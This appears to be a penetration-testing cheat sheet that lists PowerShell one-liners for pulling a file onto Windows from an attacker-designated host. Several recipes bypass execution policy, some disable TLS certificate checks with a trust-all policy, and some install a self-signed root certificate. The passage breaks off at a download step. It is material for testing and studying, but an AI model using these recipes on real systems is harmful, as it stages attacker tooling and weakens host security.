DL_ _Win_ _PowerShell
OVERVIEW:
-
InternetExplorer.Application(HTTP; HTTPS) -
Invoke-RestMethod(HTTP; HTTPS) -
Invoke-WebRequest(HTTP; HTTPS) -
Msxml2.ServerXMLHTTP(HTTP; HTTPS) -
Msxml2.XMLHTTP(HTTP; HTTPS) -
Start-BitsTransfer(HTTP; HTTPS) -
System.Net.WebClient.DownloadFile(HTTP; HTTPS) -
System.Net.WebClient.DownloadString(HTTP; HTTPS) -
System.Net.WebRequest(HTTP; HTTPS) -
System.Xml.XmlDocument(HTTP; HTTPS) -
WinHttp.WinHttpRequest.5.1(HTTP; HTTPS)
(identify supported options - Windows - file download - PowerShell)
powershell.exe -ep bypass -nop
$cls='Invoke-RestMethod','Invoke-WebRequest','Start-BitsTransfer'; "[*] PowerShell - file download - available options"; foreach ($cl in $cls){Get-Command -Name $cl|Out-Null; if($?){" [*] $cl"}}; $cos='InternetExplorer.Application','Msxml2.ServerXMLHTTP','Msxml2.XMLHTTP','WinHttp.WinHttpRequest.5.1'; foreach ($co in $cos){New-Object -ComObject $co|Out-Null; if($?){" [*] $co"}}; $ncs='System.Net.WebClient','System.Xml.XmlDocument'; foreach ($nc in $ncs){New-Object -TypeName $nc|Out-Null; if($?){" [*] $nc"}}; [System.Net.WebRequest]::Create('//1')|Out-Null; if($?){" [*] System.Net.WebRequest"};
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- COM object
- utilises Internet Explorer
- downloaded file will be deleted from cache directory upon closing Internet Explorer download window
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
- PowerShell >= 6.0.0 supports certificate validation check skipping, using
-SkipCertificateCheckswitch
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download file
$ie=(New-Object -ComObject InternetExplorer.Application); $ie.visible=$False; $ie.navigate("http://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE");
NOTE: if using HTTPS, replace http with https
4. [CLIENT] wait for file to finish downloading
5. [CLIENT] move file to current directory
$tmp=($RFILE -replace "\..*",""); $f=((Get-ChildItem -Recurse -Force -Path $env:LOCALAPPDATA\Microsoft\Windows\INetCache -ErrorAction SilentlyContinue).FullName | Out-String -Stream | Select-String -Pattern $tmp | foreach{$_ -replace "`r|`n",""}); Stop-Process -Name "iexplore"; sleep 1; mv -Force ($f -replace "$tmp.*","$tmp*") $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
4. [CLIENT] download file
$ie=(New-Object -ComObject InternetExplorer.Application); $ie.visible=$False; $ie.navigate("https://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE");
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] move file to current directory
$tmp=($RFILE -replace "\..*",""); $f=((Get-ChildItem -Recurse -Force -Path $env:LOCALAPPDATA\Microsoft\Windows\INetCache -ErrorAction SilentlyContinue).FullName | Out-String -Stream | Select-String -Pattern $tmp | foreach{$_ -replace "`r|`n",""}); Stop-Process -Name "iexplore"; sleep 1; mv -Force ($f -replace "$tmp.*","$tmp*") $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
7. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- PowerShell cmdlet
- aliases:
irm
- aliases:
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
- PowerShell >= 6.0.0 supports certificate validation check skipping, using
-SkipCertificateCheckswitch
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download file
Invoke-RestMethod -UseBasicParsing -Uri "http://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE" -OutFile $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] disable X.509 certificate validation
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(ServicePoint srvPoint, X509Certificate certificate, WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy=(New-Object -TypeName TrustAllCertsPolicy);
4. [CLIENT] download file
Invoke-RestMethod -UseBasicParsing -Uri "https://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE" -OutFile $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
4. [CLIENT] download file
Invoke-RestMethod -UseBasicParsing -Uri "https://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE" -OutFile $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
5. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- PowerShell cmdlet
- aliases:
iwrwgetcurl
- aliases:
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
- PowerShell >= 6.0.0 supports certificate validation check skipping, using
-SkipCertificateCheckswitch
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download file
Invoke-WebRequest -UseBasicParsing -Uri "http://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE" -OutFile $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] disable X.509 certificate validation
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(ServicePoint srvPoint, X509Certificate certificate, WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy=(New-Object -TypeName TrustAllCertsPolicy);
4. [CLIENT] download file
Invoke-WebRequest -UseBasicParsing -Uri "https://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE" -OutFile $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
4. [CLIENT] download file
Invoke-WebRequest -UseBasicParsing -Uri "https://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE" -OutFile $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
5. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms763684(v=vs.85)
https://learn.microsoft.com/en-us/windows/win32/winhttp/about-winhttp
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- COM object
- utilises WinHTTP
- using base64 encoding to avoid various complications with file transfer (not further analyzed)
- target web server must host base64-encoded version of target file (with
.b64appended to filename)
- target web server must host base64-encoded version of target file (with
- using
certutil.exeover PowerShell for base64 decoding to avoid performance issues with decoding (larger files)- for a pure PowerShell solution replace the
certutil.execommand with[System.Convert]::FromBase64String((Get-Content $tmp)) | Set-Content -Encoding Byte $RFILE;
- for a pure PowerShell solution replace the
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download file
$tmp="${RFILE}.b64"; $dl=(New-Object -ComObject Msxml2.ServerXMLHTTP); $dl.open("GET","http://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp",$false); $dl.send();
NOTE: if using HTTPS, replace http with https
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$dl.responseText,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
5. [CLIENT] download file
$tmp="${RFILE}.b64"; $dl=(New-Object -ComObject Msxml2.ServerXMLHTTP); $dl.open("GET","https://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp",$false); $dl.send();
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
6. [CLIENT] wait for file to finish downloading
7. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$dl.responseText,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
8. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms762275(v=vs.85)
https://learn.microsoft.com/en-us/windows/win32/wininet/about-wininet
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- COM object
- utilises WinINet
- using base64 encoding to avoid various complications with file transfer (not further analyzed)
- target web server must host base64-encoded version of target file (with
.b64appended to filename)
- target web server must host base64-encoded version of target file (with
- using
certutil.exeover PowerShell for base64 decoding to avoid performance issues with decoding (larger files)- for a pure PowerShell solution replace the
certutil.execommand with[System.Convert]::FromBase64String((Get-Content $tmp)) | Set-Content -Encoding Byte $RFILE;
- for a pure PowerShell solution replace the
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download file
$tmp="${RFILE}.b64"; $dl=(New-Object -ComObject Msxml2.XMLHTTP); $dl.open("GET","http://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp",$false); $dl.send();
NOTE: if using HTTPS, replace http with https
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$dl.responseText,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
5. [CLIENT] download file
$tmp="${RFILE}.b64"; $dl=(New-Object -ComObject Msxml2.XMLHTTP); $dl.open("GET","https://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp",$false); $dl.send();
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
6. [CLIENT] wait for file to finish downloading
7. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$dl.responseText,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
8. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- PowerShell cmdlet
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] remove any previous downloads, which may interfere
Get-BitsTransfer | Remove-BitsTransfer;
4. [CLIENT] download file
Start-BitsTransfer -Source "http://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE" -Destination $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
4. [CLIENT] remove any previous downloads, which may interfere
Get-BitsTransfer | Remove-BitsTransfer;
5. [CLIENT] download file
Start-BitsTransfer -Source "https://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE" -Destination $pwd\$RFILE; (Get-FileHash $RFILE -Algorithm MD5).Hash;
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
6. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- .NET class method
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download file
(New-Object -TypeName System.Net.WebClient).DownloadFile("http://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE","$pwd\$RFILE"); (Get-FileHash $RFILE -Algorithm MD5).Hash;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] disable X.509 certificate validation
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
4. [CLIENT] download file
(New-Object -TypeName System.Net.WebClient).DownloadFile("https://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE","$pwd\$RFILE"); (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
4. [CLIENT] download file
(New-Object -TypeName System.Net.WebClient).DownloadFile("https://${ATT_HOST}:$ATT_PORT$ATT_PATH$RFILE","$pwd\$RFILE"); (Get-FileHash $RFILE -Algorithm MD5).Hash;
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
5. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- .NET class method
- using base64 encoding to avoid various complications with file transfer (not further analyzed)
- target web server must host base64-encoded version of target file (with
.b64appended to filename)
- target web server must host base64-encoded version of target file (with
- using
certutil.exeover PowerShell for base64 decoding to avoid performance issues with decoding (larger files)- for a pure PowerShell solution replace the
certutil.execommand with[System.Convert]::FromBase64String((Get-Content $tmp)) | Set-Content -Encoding Byte $RFILE;
- for a pure PowerShell solution replace the
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download file
$tmp="${RFILE}.b64"; $res=(New-Object -TypeName System.Net.WebClient).DownloadString("http://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp");
NOTE: if using HTTPS, replace http with https
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] disable X.509 certificate validation
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; [System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
4. [CLIENT] download file
$tmp="${RFILE}.b64"; $res=(New-Object -TypeName System.Net.WebClient).DownloadString("https://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp");
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
5. [CLIENT] download file
